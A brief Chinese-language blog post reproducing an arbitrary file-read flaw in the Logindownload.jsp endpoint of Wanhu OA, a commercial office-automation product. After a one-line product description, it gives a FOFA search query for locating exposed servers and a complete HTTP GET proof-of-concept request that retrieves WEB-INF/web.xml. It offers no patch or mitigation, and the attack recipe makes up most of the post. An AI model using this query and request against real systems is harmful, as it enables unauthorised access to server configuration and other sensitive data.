大家好,欢迎来到IT知识分享网。
产品介绍
万户OA是万户网络技术有限公司OA设计的一款软件。他涵盖了共同办公、信息充分关系、各种业务系统的综合共同办公平台。
漏洞描述
由于万户OA的Logindownload接口权限设置不当,可以通过构造特殊请求的方式获取系统敏感信息。
复现环境
fofa:header=”OASESSIONID”
漏洞复现
http://your-ip/defaultroot/public/edit/logindownload/Logindownload.jspPOC
GET /defaultroot/public/edit/logindownload/Logindownload.jsp;?fileName=WEB-INF/web.xml HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/150759.html
